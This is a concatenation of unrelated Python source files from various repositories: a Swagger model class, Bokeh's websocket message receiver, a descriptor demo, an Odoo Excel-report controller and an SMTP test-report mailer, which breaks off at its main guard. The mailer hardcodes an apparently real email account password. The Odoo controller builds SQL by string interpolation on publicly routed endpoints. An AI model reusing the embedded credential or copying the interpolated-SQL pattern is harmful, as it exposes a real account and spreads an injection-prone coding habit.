    def __init__(self, error=None, error_code=None):
        """
        ErrorMessage - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
                                  and the value is attribute type.
        :param dict attributeMap: The key is attribute name
                                  and the value is json key in definition.
        """
        self.swagger_types = {
            'error': 'str',
            'error_code': 'int'
        }

        self.attribute_map = {
            'error': 'error',
            'error_code': 'error_code'
        }

        self._error = error
        self._error_code = error_code

    @property
    def error(self):
        """
        Gets the error of this ErrorMessage.

        :return: The error of this ErrorMessage.
        :rtype: str
        """
        return self._error

    @error.setter
    def error(self, error):
        """
        Sets the error of this ErrorMessage.

        :param error: The error of this ErrorMessage.
        :type: str
        """
        self._error = error

    @property
    def error_code(self):
        """
        Gets the error_code of this ErrorMessage.

        :return: The error_code of this ErrorMessage.
        :rtype: int
        """
        return self._error_code

    @error_code.setter
    def error_code(self, error_code):
        """
        Sets the error_code of this ErrorMessage.

        :param error_code: The error_code of this ErrorMessage.
        :type: int
        """
        self._error_code = error_code

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}

        # Recursively convert nested models (anything with to_dict) inside
        # lists, dicts, or direct attributes.
        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        # Guard against non-ErrorMessage operands (e.g. ints have no
        # __dict__, which previously raised AttributeError); this also
        # matches the other generated models in this codebase.
        if not isinstance(other, ErrorMessage):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
| [
"emrekabakci@gmail.com"
] | emrekabakci@gmail.com |
def remove_vogais(frase):
    """Return `frase` lower-cased with all (unaccented) vowels removed.

    Bug fix: the original tested ``vogais not in frase[contador]`` — a
    list-in-string membership test that raises TypeError on the first
    iteration.  The intended per-character test is ``char not in vogais``.
    """
    frase = str(frase).lower()
    vogais = "aeiou"
    return "".join(letra for letra in frase if letra not in vogais)
"you@example.com"
] | you@example.com |
f8ac40843de7f398c6de044fef0cb2f7be52b6fa | 1dacbf90eeb384455ab84a8cf63d16e2c9680a90 | /pkgs/bokeh-0.11.1-py27_0/lib/python2.7/site-packages/bokeh/server/protocol/receiver.py | 9d0143575ad9d50cb757456cb0c4061dbac5d25d | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown"
] | permissive | wangyum/Anaconda | ac7229b21815dd92b0bd1c8b7ec4e85c013b8994 | 2c9002f16bb5c265e0d14f4a2314c86eeaa35cb6 | refs/heads/master | 2022-10-21T15:14:23.464126 | 2022-10-05T12:10:31 | 2022-10-05T12:10:31 | 76,526,728 | 11 | 10 | Apache-2.0 | 2022-10-05T12:10:32 | 2016-12-15T05:26:12 | Python | UTF-8 | Python | false | false | 3,054 | py | ''' Assemble websocket wire message fragments into complete Bokeh Server
message objects that can be processed.
'''
from __future__ import absolute_import
import six
from tornado.concurrent import return_future
from ..exceptions import ValidationError
import logging
log = logging.getLogger(__name__)
class Receiver(object):
    '''
    Assemble websocket fragments into complete messages via a small state
    machine: `_current_consumer` always points at the method that will
    handle the next fragment (HEADER -> METADATA -> CONTENT, then zero or
    more BUFFER_HEADER/BUFFER_PAYLOAD pairs until the partial message
    reports itself complete).

    On MessageError or ValidationError, the receiver will reset its state
    and attempt to consume a new message.

    NOTE: the *fragment* received can be either bytes or unicode, depending
    on the transport's semantics (WebSocket allows both).

    [
        # these are required
        b'{header}',     # serialized header dict
        b'{metadata}',   # serialized metadata dict
        b'{content}',    # serialized content dict

        # these are optional, and come in pairs; header contains num_buffers
        b'{buf_header}', # serialized buffer header dict
        b'array'         # raw buffer payload data
        ...
    ]
    '''
    def __init__(self, protocol):
        # `protocol` supplies assemble(); start in the HEADER state with
        # no message and no pending buffer header.
        self._protocol = protocol
        self._current_consumer = self._HEADER
        self._message = None
        self._buf_header = None
    @return_future
    def consume(self, fragment, callback=None):
        '''
        Feed one wire fragment to the current state handler and resolve the
        future with the completed message (or None while still partial).
        '''
        self._current_consumer(fragment)
        callback(self._message)
    def _HEADER(self, fragment):
        # First fragment of a new message: reset all per-message state.
        self._assume_text(fragment)
        self._message = None
        self._partial = None
        self._fragments = [fragment]
        self._current_consumer = self._METADATA
    def _METADATA(self, fragment):
        self._assume_text(fragment)
        self._fragments.append(fragment)
        self._current_consumer = self._CONTENT
    def _CONTENT(self, fragment):
        # Third required fragment: the protocol can now assemble a partial
        # message from header/metadata/content JSON.
        self._assume_text(fragment)
        self._fragments.append(fragment)
        header_json, metadata_json, content_json = self._fragments[:3]
        self._partial = self._protocol.assemble(header_json, metadata_json, content_json)
        self._check_complete()
    def _BUFFER_HEADER(self, fragment):
        # Buffer header (text) is held until its binary payload arrives.
        self._assume_text(fragment)
        self._buf_header = fragment
        self._current_consumer = self._BUFFER_PAYLOAD
    def _BUFFER_PAYLOAD(self, fragment):
        self._assume_binary(fragment)
        self._partial.assemble_buffer(self._buf_header, fragment)
        self._check_complete()
    def _check_complete(self):
        # Either publish the finished message and restart, or expect
        # another buffer header/payload pair.
        if self._partial.complete:
            self._message = self._partial
            self._current_consumer = self._HEADER
        else:
            self._current_consumer = self._BUFFER_HEADER
    def _assume_text(self, fragment):
        # Validation guards: the error names the state that was violated.
        if not isinstance(fragment, six.text_type):
            raise ValidationError("expected text fragment but received binary fragment for %s" % (self._current_consumer.__name__))
    def _assume_binary(self, fragment):
        if not isinstance(fragment, six.binary_type):
            raise ValidationError("expected binary fragment but received text fragment for %s" % (self._current_consumer.__name__))
| [
"wgyumg@mgail.com"
] | wgyumg@mgail.com |
093fc662077fab8d376ec677f4b1a61b8270631e | 25ebc03b92df764ff0a6c70c14c2848a49fe1b0b | /daily/20191012/example_metashape/17walker.py | 3c668d9b7ae518dec2b9f57007d8896ff261d94c | [] | no_license | podhmo/individual-sandbox | 18db414fafd061568d0d5e993b8f8069867dfcfb | cafee43b4cf51a321f4e2c3f9949ac53eece4b15 | refs/heads/master | 2023-07-23T07:06:57.944539 | 2023-07-09T11:45:53 | 2023-07-09T11:45:53 | 61,940,197 | 6 | 0 | null | 2022-10-19T05:01:17 | 2016-06-25T11:27:04 | Python | UTF-8 | Python | false | false | 1,612 | py | import typing as t
T = t.TypeVar("T")
F = t.TypeVar("F", bound=t.Callable[..., t.Any])
# Metadata attached to a field: a plain dict (or None).
MetaData = t.Optional[t.Dict[str, t.Any]]
class Field(t.Generic[F]):
    """Descriptor wrapping a callable; evaluates it on attribute access.

    The wrapped callable's docstring is mirrored onto the descriptor and
    recorded under `metadata["doc"]`.
    """
    wrapped: F
    def __init__(self, wrapped: F):
        self.wrapped = wrapped
        try:
            self.__doc__ = wrapped.__doc__
        except: # noqa
            # best effort: some callables may not expose __doc__
            pass
        self.metadata = {"doc": getattr(self, "__doc__", None)}
    def __get__(self, obj, type=None) -> T:
        # Non-data descriptor: invoked for class *and* instance access;
        # on class access `obj` is None, so the callable receives None.
        return self.wrapped(obj)
def get_metadata(cls: t.Type[t.Any], name: str) -> t.Optional[MetaData]:
    """Return the `metadata` of attribute `name` declared directly on
    `cls` (base classes are not searched), or None when absent."""
    attr = cls.__dict__.get(name)
    return None if attr is None else attr.metadata
def walk(
    typ: t.Type[t.Any]
) -> t.Iterable[t.Tuple[str, t.Type[t.Any], t.Optional[MetaData]]]:
    """Yield (name, type hint, metadata) for every annotated field of `typ`."""
    hints = t.get_type_hints(typ)
    for name, hint in hints.items():
        yield name, hint, get_metadata(typ, name)
class Person:
    """Plain annotated record: `name` is required, `age` defaults to 0."""
    name: str
    age: int = 0
def field(fn: F) -> Field[F]:
    """Decorator: wrap `fn` in a Field descriptor."""
    return Field(fn)
class WPerson(Person):
    """Person variant whose fields are computed Field descriptors."""
    @field
    def name(self) -> str:
        """name docstring"""
        return "<name>"
    @field
    def nickname(self) -> t.Optional[str]:
        """nickname docstring"""
        return None
# Demo: Field descriptors compute their value even on class access.
print(WPerson.nickname, WPerson.age)
print(get_metadata(WPerson, "nickname"))
print("----------------------------------------")
for x in walk(WPerson):
    print(x)
if t.TYPE_CHECKING:
    # Static-analysis only: asks the type checker to print inferred types.
    reveal_type(WPerson.nickname)
    reveal_type(WPerson().nickname)
print("========================================")
wp = WPerson()
print(wp.name, wp.nickname)
# Field has no __set__, so it is a non-data descriptor: this instance
# attribute shadows the class-level descriptor from now on.
wp.nickname = "foo"
print(wp.name, wp.nickname)
| [
"ababjam61+github@gmail.com"
] | ababjam61+github@gmail.com |
10434a32e795ec5d304e1fbec30670e8cb3a4881 | 0b51bc6c7a98d07880955a31e147c0c15b1e3151 | /dai_tgg/controllers/controllers.py | 855f610f76a3b62a852f1dbc2ab1f73872d7dd4b | [] | no_license | tu95ctv/duan_mi2 | 72e8bcbad73dfea1b57b69dbfd1c8d48ecebb975 | f1728d99e27fcc18684d50f5719f3dcedcffd755 | refs/heads/master | 2020-04-28T21:30:25.017845 | 2019-07-07T13:25:43 | 2019-07-07T13:25:43 | 175,584,277 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,900 | py | # -*- coding: utf-8 -*-
from odoo import http
from openerp import http
from openerp.http import request
from openerp.addons.web.controllers.main import serialize_exception,content_disposition
import base64
# from openpyxl import load_workbook
# from cStringIO import StringIO
from odoo.tools.misc import xlwt
from copy import deepcopy
from odoo import api,fields
import datetime
import odoo.addons.web.controllers.pivot as pivot
import json
from odoo.tools import ustr
from collections import deque
from odoo.osv import expression
from dateutil.relativedelta import relativedelta
import pytz
import string
from odoo.addons.tutool.mytools import convert_date_odoo_to_str_vn_date, convert_utc_native_dt_to_gmt7
from unidecode import unidecode
from odoo.addons.downloadwizard.download_tool import download_all_model_by_url
def get_width(num_characters):
    """Convert a character count into an xlwt column width (256 units per
    character, plus one character of padding)."""
    padded = 1 + num_characters
    return int(padded * 256)
def add_header_TrungTamHaTangMang(worksheet,user_id,ROW_TRUNG_TAM,offset_column,normal_style,bold_style,ROW_SUM,KEY_COL,VAL_COL):
    """Write the sheet header: center/station banner, employee name,
    department, and the two "total score" labels.

    The actual SUM formulas are written later by add_sum_info at
    (ROW_SUM, VAL_COL) and (ROW_SUM + 1, VAL_COL).
    """
    cty_bold_style = xlwt.easyxf("font: bold on, name Times New Roman, height 256; align: horiz left, vert centre, wrap 1; alignment: wrap 1")# align: horiz centre, vert centre
    ROW_HO_TEN = ROW_TRUNG_TAM + 1   # "full name" row
    ROW_TRAM = ROW_TRUNG_TAM + 2     # "station" row
    worksheet.write_merge(ROW_TRUNG_TAM, ROW_TRUNG_TAM, 0, 4, u'TRUNG TÂM HẠ TẦNG MẠNG MIỀN NAM\n ĐÀI VIỄN THÔNG HỒ CHÍ MINH',cty_bold_style)
    worksheet.row(ROW_TRUNG_TAM).height_mismatch = True
    worksheet.row(ROW_TRUNG_TAM).height = 256*5
    worksheet.write(ROW_HO_TEN,KEY_COL,u'Họ và Tên',normal_style)
    worksheet.write(ROW_HO_TEN, VAL_COL,user_id.name,bold_style)
    worksheet.write(ROW_TRAM,KEY_COL, u'Trạm',normal_style)
    worksheet.write(ROW_TRAM,VAL_COL ,user_id.department_id.name,bold_style)
    # BUG FIX: both labels used to target (ROW_SUM, KEY_COL), so the first
    # one was silently clobbered (the sheet allows cell overwrites).
    # download_cvi() places the leader total ('diemld') on ROW_SUM and the
    # employee total ('diemtc') on ROW_SUM + 1, so the labels follow suit.
    worksheet.write(ROW_SUM, KEY_COL,u'Điểm Tổng LĐ Chấm',normal_style)
    worksheet.write(ROW_SUM + 1, KEY_COL,u'Điểm Tổng Nhân Viên Chấm',normal_style)
def add_title(FIELDNAME_FIELDATTR,cvi_fields,offset_column,worksheet,ROW_TITLE):
    """Write the bold grey header row: one cell per exported field, sizing
    each column either from the field's declared 'width' or from its label."""
    header_bold_style = xlwt.easyxf("font: bold on, name Times New Roman, height 240 ; pattern: pattern solid, fore_colour gray25;borders: left thin, right thin, top thin, bottom thin")
    for column_index, (f_name, attrs) in enumerate(FIELDNAME_FIELDATTR, start=offset_column):
        if attrs.get('is_not_model_field'):
            # Synthetic column: label comes from the attr dict (fallback:
            # the field key itself).
            label = attrs.get('string') or f_name
        else:
            # Real odoo field: use its translated string.
            label = cvi_fields[f_name].string
        worksheet.write(ROW_TITLE, column_index, label, header_bold_style)
        column_width = attrs.get('width') or get_width(len(label))
        worksheet.col(column_index).width = column_width
def add_1_cvi_for_1_person(worksheet,FIELDNAME_FIELDATTR, r,offset_column,stt,row_index,normal_border_style):
    """Write one cvi record *r* as spreadsheet row *row_index*.

    *stt* is the 1-based sequence number shown in the synthetic 'stt' column.
    """
    for title_column_index, field_from_my_FIELDNAME_FIELDATTR in enumerate(FIELDNAME_FIELDATTR):
        title_column_index += offset_column
        f_name,FIELDATTR = field_from_my_FIELDNAME_FIELDATTR
        is_not_model_field = FIELDATTR.get('is_not_model_field')
        if is_not_model_field:
            # Synthetic column; 'stt' is the only one declared today.
            # NOTE(review): any other synthetic field would leave ``val``
            # unbound below — confirm 'stt' stays the only such column.
            if f_name=='stt':
                val = stt
        else:
            val = getattr(r, f_name)
        func = FIELDATTR.get('func',None)
        if func:
            # Optional per-field formatter (e.g. odoo date -> VN date string).
            val = func(val)
        if val == False:
            # ``==`` (not ``is``): note 0 == False is True, so a numeric 0 is
            # also rendered as an empty cell.
            val = u''
        worksheet.write(row_index, title_column_index, val, normal_border_style)
def add_sum_info(worksheet,FIELDNAME_FIELDATTR,offset_column,num2alpha,ROW_TITLE,ROW_SUM,VAL_COL,last_row_index):
    """Write a SUM() formula for every column flagged with 'sum', at the
    (row_sum, col_sum) position declared on that column."""
    for column_index, (f_name, attrs) in enumerate(FIELDNAME_FIELDATTR, start=offset_column):
        # Synthetic columns and columns without the 'sum' flag get no total.
        if attrs.get('is_not_model_field') or not attrs.get('sum'):
            continue
        target_row = attrs.get('row_sum')
        target_col = attrs.get('col_sum')
        column_letter = num2alpha[column_index]
        # Data rows start two rows below the title row (xlwt rows are
        # 0-based, spreadsheet formulas 1-based).
        formula = xlwt.Formula('SUM(%s%s:%s%s)'%(column_letter,ROW_TITLE + 2,column_letter,last_row_index))
        worksheet.write(target_row, target_col, formula)
def filter_department_ids(department_ids):
    """Return the ids of the departments picked on the wizard, falling back
    to the current user's own department when none were selected."""
    if not department_ids:
        return [request.env.user.department_id.id]
    return department_ids.ids
def generate_domain_date_and_department(dlcv_obj, theo_sql = False):
    """Build the record filter for the wizard's departments + date range.

    Returns an odoo search domain (list) when *theo_sql* is False, or a raw
    SQL WHERE-clause string (without the 'where' keyword) when it is True.
    Raises ValueError when the user has no department to fall back on.
    """
    domain = []
    if theo_sql:
        where_clause_list = []
    department_ids = dlcv_obj.department_ids
    export_department_ids = filter_department_ids(department_ids)
    if export_department_ids:
        if theo_sql:
            # Render "in (a, b)"; the replace() fixes the 1-tuple "(a,)" form.
            department_clause = ("cvi.department_id in %s"%(tuple(export_department_ids),)).replace(',)',')')
            where_clause_list.append(department_clause)
        else:
            domain.append(('department_id','in',export_department_ids))
    else:
        raise ValueError(u'Bạn không có quyền xem Báo cáo của những trạm đó')
    if dlcv_obj.chon_thang ==u'Tháng Này':
        # "This month": [first day of this month, first day of next month)
        # in VN local time (UTC+7).
        utc_time = datetime.datetime.now()
        vn_time = convert_utc_native_dt_to_gmt7(utc_time)
        vn_thang_nay_date_begin = vn_time.strftime('%Y-%m-01')
        vn_time_offset_thang_sau = vn_time + relativedelta(months=1)
        vn_thang_nay_date_end = vn_time_offset_thang_sau.strftime('%Y-%m-01')
        if not theo_sql:
            domain = expression.AND([[('ngay_bat_dau','>=',vn_thang_nay_date_begin),('ngay_bat_dau','<',vn_thang_nay_date_end)],domain])
        else:
            # BUG FIX: these two date literals were interpolated WITHOUT
            # quotes, producing invalid SQL; the 'Tháng Trước' branch below
            # already quoted them.
            where_clause_list.append("cvi.ngay_bat_dau >= '%s'"%vn_thang_nay_date_begin)
            where_clause_list.append("cvi.ngay_bat_dau < '%s'"%vn_thang_nay_date_end)
    elif dlcv_obj.chon_thang ==u'Tháng Trước':
        # "Last month": [first day of last month, first day of this month).
        utc_time = datetime.datetime.now()
        vn_time = convert_utc_native_dt_to_gmt7(utc_time)
        thang_truoc_time = vn_time + relativedelta(months=-1)
        thang_truoc_date_begin = thang_truoc_time.strftime('%Y-%m-01')
        thang_truoc_date_end = vn_time.strftime('%Y-%m-01')
        if not theo_sql:
            domain = expression.AND([[('ngay_bat_dau','>=',thang_truoc_date_begin),('ngay_bat_dau','<',thang_truoc_date_end)],domain])
        else:
            where_clause_list.append("cvi.ngay_bat_dau >= '%s'"%thang_truoc_date_begin)
            where_clause_list.append("cvi.ngay_bat_dau < '%s'"%thang_truoc_date_end)
    else:
        # Explicit range picked on the wizard; either bound is optional.
        if dlcv_obj.ngay_bat_dau_filter:
            if not theo_sql:
                domain = expression.AND([[('ngay_bat_dau','>=',dlcv_obj.ngay_bat_dau_filter)],domain])
            else:
                where_clause_list.append("cvi.ngay_bat_dau >= '%s'"%dlcv_obj.ngay_bat_dau_filter)
        if dlcv_obj.ngay_ket_thuc_filter:
            if not theo_sql:
                domain = expression.AND([[('ngay_bat_dau','<=',dlcv_obj.ngay_ket_thuc_filter)],domain])
            else:
                where_clause_list.append("cvi.ngay_bat_dau <= '%s'"%dlcv_obj.ngay_ket_thuc_filter)
    if theo_sql:
        # NOTE(review): values are string-interpolated, not parameterised.
        # They come from stored fields rather than raw request input, but
        # parameterising the final query would still be safer.
        return ' and '.join(where_clause_list)
    else:
        return domain
def download_cvi(dlcv_obj):
    """Build an xlwt workbook with one sheet per user of the selected
    departments, listing each user's u'Công Việc' cvi records plus totals.

    NOTE: the HTTP route DownloadCvi.download_cvi() shares this name and
    calls this module-level function from its body — keep both in sync.
    """
    num2alpha = dict(zip(range(0, 26), string.ascii_uppercase))  # 0->'A' .. 25->'Z'
    normal_style = xlwt.easyxf("font: name Times New Roman, height 240")
    normal_border_style = xlwt.easyxf("font: name Times New Roman, height 240 ;borders: left thin,right thin, top thin, bottom thin")
    bold_style = xlwt.easyxf("font: bold on")
    department_ids = dlcv_obj.department_ids
    export_department_ids = filter_department_ids(department_ids)
    user_ids = request.env['res.users'].search([('department_id','in',export_department_ids)])
    workbook = xlwt.Workbook()
    # Sheet layout constants (0-based xlwt coordinates).
    offset_column = 0
    ROW_TRUNG_TAM=0
    ROW_SUM = ROW_TRUNG_TAM + 3
    KEY_COL = offset_column + 3
    VAL_COL = offset_column + 4
    ROW_TITLE = ROW_TRUNG_TAM + 5
    # Column spec: (field key, attrs). 'is_not_model_field' marks synthetic
    # columns; 'sum' columns get a SUM() formula at (row_sum, col_sum).
    FIELDNAME_FIELDATTR = [
        ('stt',{'is_not_model_field':True,'string':u'STT'}),
        ('ngay_bat_dau',{'func':convert_date_odoo_to_str_vn_date,'width':get_width(10)}),
        ('code',{}),('tvcv_id_name',{'width':get_width(40)}),
        ('noi_dung',{'width':get_width(40)}),
        ('diem_tvcv',{}),('so_luong',{}),('so_lan',{}),
        ('diemtc',{'sum':True, 'row_sum':ROW_SUM+1, 'col_sum':VAL_COL}),
        ('diemld',{'sum':True,'row_sum':ROW_SUM, 'col_sum':VAL_COL}),
    ]
    domain = []
    # Date/department part of the domain is shared by every user sheet.
    domain_date = generate_domain_date_and_department(dlcv_obj)
    for user_id in user_ids:
        domain_user = [('user_id','=',user_id.id),('loai_record','=',u'Công Việc')]
        domain = expression.AND([domain_user, domain_date])
        # cell_overwrite_ok: header helper may rewrite cells on this sheet.
        worksheet = workbook.add_sheet(user_id.name,cell_overwrite_ok=True)
        add_header_TrungTamHaTangMang(worksheet,user_id,ROW_TRUNG_TAM,offset_column,normal_style,bold_style,ROW_SUM,KEY_COL,VAL_COL)
        cvi_fields = request.env['cvi']._fields
        add_title(FIELDNAME_FIELDATTR, cvi_fields, offset_column, worksheet, ROW_TITLE)
        row_index = ROW_TITLE + 1
        stt = 1
        person_records = request.env['cvi'].search(domain,order='ngay_bat_dau')
        for r in person_records:
            add_1_cvi_for_1_person(worksheet,FIELDNAME_FIELDATTR, r,offset_column, stt, row_index, normal_border_style)
            row_index +=1
            stt += 1
        # row_index now points one past the last data row, which is exactly
        # the 1-based spreadsheet row of that last data row.
        add_sum_info(worksheet,FIELDNAME_FIELDATTR,offset_column,num2alpha,ROW_TITLE,ROW_SUM,VAL_COL,row_index)
    return workbook
class DownloadCvi(http.Controller):
    """HTTP endpoints that stream xlwt workbooks of cvi data to the browser."""

    @http.route('/web/binary/download_cvi_by_userlist',type='http', auth="public")
    def download_cvi_by_userlist(self,model, id, **kw):
        """One-sheet summary: total 'diemtc' per user for the wizard's filter."""
        dlcv_obj = request.env[model].browse(int(id))
        where_clause = generate_domain_date_and_department (dlcv_obj, theo_sql = True)
        # NOTE(review): where_clause is interpolated straight into the SQL
        # below. Its values come from stored records, but this pattern is
        # still injection-prone — prefer parameterised queries.
        sql_cmd = '''select cvi.user_id,sum(diemtc),u.login,p.name from cvi inner join res_users as u on cvi.user_id = u.id inner join res_partner as p on u.partner_id = p.id %s group by cvi.user_id ,u.login,p.name'''
        sql_cmd = sql_cmd%((' where ' + where_clause )if where_clause else '')
        request.env.cr.execute(sql_cmd)
        rsul = request.env.cr.fetchall()
        workbook = xlwt.Workbook()
        worksheet = workbook.add_sheet('Sheet 1')
        normal_style = xlwt.easyxf("font: name Times New Roman, height 240")
        worksheet.write(0,0,'STT',normal_style)
        worksheet.write(0,1,u'Tên',normal_style)
        worksheet.write(0,2,u'Điểm', normal_style)
        row_index = 1
        stt =1
        for u_id,diem,login,name in rsul:
            worksheet.write(row_index,0,stt,normal_style)
            worksheet.write(row_index,1,login,normal_style)
            worksheet.write(row_index,2,diem,normal_style)
            row_index += 1
            stt +=1
        response = request.make_response(None,
                headers=[('Content-Type', 'application/vnd.ms-excel'),
                        ('Content-Disposition', 'attachment; filename=table_cv_%s_%s.xls;'%(request.env.user.name, datetime.datetime.now().strftime('%d_%m_%H_%M')))],
                )
        # xlwt writes the binary workbook directly into the response stream.
        workbook.save(response.stream)
        return response

    @http.route('/web/binary/download_cvi',type='http', auth="public")
    def download_cvi(self,model, id, **kw):
        """Detailed report: one sheet per user (see module-level download_cvi)."""
        dlcv_obj = request.env[model].browse(int(id))
        # Resolves to the MODULE-LEVEL download_cvi function (class attributes
        # are not in scope inside method bodies), not to this method.
        workbook = download_cvi(dlcv_obj)
        response = request.make_response(None,
                headers=[('Content-Type', 'application/vnd.ms-excel'),
                        ('Content-Disposition', 'attachment; filename=chi_tiet_p3_%s_%s.xls;target=blank' %(unidecode(dlcv_obj.department_ids.name).replace(' ','_'), datetime.datetime.now().strftime('%d_%m_%H_%M')))],
                )
        workbook.save(response.stream)
        return response

    @http.route('/web/binary/download_model',type='http', auth="public")
    def download_all_model_controller(self,**kw):
        """Generic model export; delegates to the downloadwizard helper."""
        response = download_all_model_by_url(kw)
        return response
| [
"nguyenductu@gmail.com"
] | nguyenductu@gmail.com |
d2f89f70fa06f176959af33099a52a2d67651e66 | f0ee6af776b92f98881ce9dfb2f4df0b760f1ca6 | /dublicate.py | 20945ad7daa791b4a847395e6e574e7a57b39e47 | [] | no_license | madhu20336/dictionary | 4cb8e240b2167d6e3071b4eb867977a3e25b9479 | a9f6d1e4887ae4300ea034e2bb6054cfad91d610 | refs/heads/main | 2023-04-23T10:30:09.114402 | 2021-05-15T11:38:58 | 2021-05-15T11:38:58 | 367,615,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | # dict={"A":1,"B":2,"C":3,"C":5,"B":6,"A":7}
# for i in dict.items():
# if i in dict:
# del dict[i]
# print(dict)
| [
"noreply@github.com"
] | madhu20336.noreply@github.com |
c0430d2eeb1e8011132f75363c50f7f85c37b417 | 8524e35d5848e7c6dcc774d35818c12bbc01bf67 | /taocode2/apps/user/auth.py | bbc40f94e10c64987528b578c36450d890be0cfb | [] | no_license | imbugs/taobaocode | 80f49e1829807b4751b2a6e6949c850843b996a7 | a8fbd7fc2f0d3f88eaeda7d944bcc688dee47b18 | refs/heads/master | 2021-01-02T23:06:29.518047 | 2013-05-16T03:34:47 | 2013-05-16T03:34:47 | 10,093,033 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,390 | py | #
# Copyright (C) 2011 Taobao .Inc
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://code.taobao.org/license.html.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://code.taobao.org/.
from taocode2.models import User, secpwd
from taocode2.helper import consts
from django.db.models import Q
__author__ = 'luqi@taobao.com'
class UserAuthBackend:
    """Authentication backend matching users by name OR email
    (case-insensitive); only enabled accounts may log in."""

    def authenticate(self, username=None, password=None):
        # Accept either the account name or the email address as the login.
        lookup = Q(name__iexact=username) | Q(email__iexact=username)
        try:
            user = User.objects.get(lookup, status=consts.USER_ENABLE)
        except User.DoesNotExist:
            return None
        # Compare the hashed candidate against the stored digest.
        return user if secpwd(password) == user.password else None

    def get_user(self, user_id):
        try:
            return User.objects.get(pk=user_id)
        except User.DoesNotExist:
            return None

    def has_perm(self, user, perm):
        # This backend grants no permissions of its own.
        return False

    def supports_object_permissions(self):
        return False

    def supports_anonymous_user(self):
        return False
| [
"imbugs@126.com"
] | imbugs@126.com |
f6b9b2ad4df858c10c4208fc0b3d6b28d0608d5f | d87f6d9e769709def3efcf30230cd8bf6ac2cef7 | /WWTest/util/sendEmailWithLink.py | 7bc4933f1049b445a170df1cade57d1a844b7237 | [] | no_license | wawj901124/centos8xitong | 876dcc45b895871119404ad1899ca59ab5dd90b6 | 81fc0d1151e3172ceec2093b035d2cd921e1a433 | refs/heads/master | 2023-02-23T22:33:22.314433 | 2021-01-31T01:54:35 | 2021-01-31T01:54:35 | 290,476,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,028 | py | import smtplib #导入smtplib,用来发送邮件和连接服务器
from email.mime.text import MIMEText #导入MIMEText,用来组织邮件格式内容
from email.mime.multipart import MIMEMultipart #添加附件用
from email.mime.application import MIMEApplication #添加附件用
class SendEmail:
    """Send automated-test report mails (summary text, optional HTML report
    link, and the report file as an attachment) via a fixed 263.net account."""

    # Kept as globals() assignments for backward compatibility: send_mail and
    # any other module code read these as module-level names.
    globals()['send_user'] = "xiang_kaizheng@wanweitech.com"  # sender address
    globals()['email_host'] = "smtp.263.net"                  # SMTP server
    globals()['password'] = "wanwei889"                       # sender password

    def send_mail(self, user_list, sub, content, filenamepath, reporturl=None):
        """Compose and send one mail.

        user_list: recipient addresses; sub: subject; content: plain-text
        body; filenamepath: file attached to the mail; reporturl: when given,
        an HTML part linking to the online report is prepended.
        """
        user = "Mushishi" + "<" + send_user + ">"
        message = MIMEMultipart()
        if reporturl is not None:
            # The HTML part must be attached before the plain part, otherwise
            # some clients show only the plain text.
            # BUG FIX: the heading used to open with <h1> but close with </h2>.
            html_msg = \
                """
                <!DOCTYPE html>
                <html lang="en">
                <head>
                    <meta charset="UTF-8">
                    <title>测试报告</title>
                </head>
                <body>
                <h1>报告网址:<a href="%s">%s</a></h1>
                </html>
                """ % (reporturl, reporturl)
            content_html = MIMEText(html_msg, "html", "utf-8")
            message.attach(content_html)
        message.attach(MIMEText(content, _subtype='plain', _charset='utf-8'))
        message['Subject'] = sub
        message['From'] = user
        message['To'] = ";".join(user_list)
        # Attach the report file; BUG FIX: close the handle instead of
        # leaking it (the original open() was never closed).
        with open(filenamepath, 'rb') as report_file:
            htmlpart = MIMEApplication(report_file.read())
        htmlpart.add_header('Content-Disposition', 'attachment', filename=filenamepath)
        message.attach(htmlpart)
        server = smtplib.SMTP()
        try:
            server.connect(email_host)
            server.login(send_user, password)
            server.sendmail(user, user_list, message.as_string())
        finally:
            # BUG FIX: always release the connection, even when connect/login/
            # send raises.
            server.close()

    def run_send(self, pass_count, fail_count, error_count, filenamepath, userlist=None, emailtitle=None):
        """Send the summary mail without a report link.

        Kept for backward compatibility; its body was a verbatim copy of
        run_send_with_report, so it now simply delegates with reporturl=None.
        """
        self.run_send_with_report(pass_count, fail_count, error_count,
                                  filenamepath, userlist, emailtitle,
                                  reporturl=None)

    def run_send_with_report(self, pass_count, fail_count, error_count, filenamepath, userlist=None, emailtitle=None, reporturl=None):
        """Compute pass/fail/error ratios and mail the summary, optionally
        with a link to the online report.

        NOTE: all three counts being 0 raises ZeroDivisionError, as before.
        """
        pass_num = float(pass_count)
        fail_num = float(fail_count)
        error_num = float(error_count)
        count_num = pass_num + fail_num + error_num
        # Percentages rendered like "90.00%" (%% escapes the percent sign).
        pass_result = "%.2f%%" % (pass_num / count_num * 100)
        fail_result = "%.2f%%" % (fail_num / count_num * 100)
        error_result = "%.2f%%" % (error_num / count_num * 100)
        user_list = ['xiang_kaizheng@wanweitech.com'] if userlist is None else userlist
        sub = "自动化测试报告" if emailtitle is None else emailtitle
        content = "此次一共执行用例个数为%s个,成功个数为%s个,失败个数为%s个,错误个数为%s个,通过率为%s,失败率为的%s,错误率为%s." % (count_num, pass_num, fail_num, error_num, pass_result, fail_result, error_result)
        self.send_mail(user_list, sub, content, filenamepath, reporturl=reporturl)
if __name__ == '__main__':
